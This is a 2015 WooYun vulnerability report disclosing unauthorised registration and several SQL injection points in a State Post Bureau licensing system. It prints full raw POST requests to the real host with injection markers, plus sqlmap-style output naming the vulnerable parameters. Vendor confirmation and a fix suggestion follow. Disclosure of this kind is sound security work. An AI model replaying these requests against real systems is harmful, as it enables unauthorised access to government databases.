当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0143711

漏洞标题:国家邮政局某系统多处问题

相关厂商:国家邮政局

漏洞作者: ADFSEC

提交时间:2015-09-29 21:59

修复时间:2015-11-14 09:00

公开时间:2015-11-14 09:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-29: 细节已通知厂商并且等待厂商处理中
2015-09-30: 厂商已经确认,细节仅向厂商公开
2015-10-10: 细节向核心白帽子及相关领域专家公开
2015-10-20: 细节向普通白帽子公开
2015-10-30: 细节向实习白帽子公开
2015-11-14: 细节向公众公开

简要描述:

未授权访问,到SQL注入

详细说明:

http://kdjyxk.post.gov.cn/company/reg.jsp?provinceId=0
存在注册页面,在注册页面内可以注册账户,这样我们就可以登录后台了。
登录后台后里面存在多处SQL注入
首先之前有人提过的例子
WooYun: 国家邮政局某后台弱口令&SQL注入&任意文件上传(打包漏洞合集)
发现还有好多处SQL注入

4D80AFCB-C8A4-4F5D-9C39-7B91C48F081D.png


0EBAC824-F84A-4258-8ABE-C7AC46AA52CC.png


分支机构管理功能里-分支机构备案管理存在SQL注入
post包如下

POST /sys_getQuestionList.do?flag=1 HTTP/1.1
Host: kdjyxk.post.gov.cn
Proxy-Connection: keep-alive
Content-Length: 63
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://kdjyxk.post.gov.cn
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://kdjyxk.post.gov.cn/sys_getQuestionList.do?flag=1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: JSESSIONID=C552137D3B39FFF8023D295C63330E8D
questionKey=*&questionDate=&questionDateEnd=&questionStatus=0


123.png


分支机构管理功能里-分支机构备案账号管理存在SQL注入

POST /register_beianLogin.do?flag=1 HTTP/1.1
Host: kdjyxk.post.gov.cn
Proxy-Connection: keep-alive
Content-Length: 65
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://kdjyxk.post.gov.cn
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://kdjyxk.post.gov.cn/register_beianLogin.do?flag=1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: JSESSIONID=C552137D3B39FFF8023D295C63330E8D
fbcomcName=&fbcomcLoginName=&province=1&city=0&x=28&y=16


存在SQL注入参数

[0] place: POST, parameter: fbcomcName, type: Single quoted string (default)
[1] place: POST, parameter: fbcomcLoginName, type: Single quoted string
[2] place: POST, parameter: province, type: Unescaped numeric
[3] place: POST, parameter: city, type: Unescaped numeric

漏洞证明:

questionKey=*&questionDate=&questionDateEnd=&questionStatus=0</code>

123.png

修复方案:

防止未授权访问,参数化查询过滤SQL注入,上waf

版权声明:转载请注明来源 ADFSEC@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-09-30 08:59

厂商回复:

感谢您的贡献

最新状态:

暂无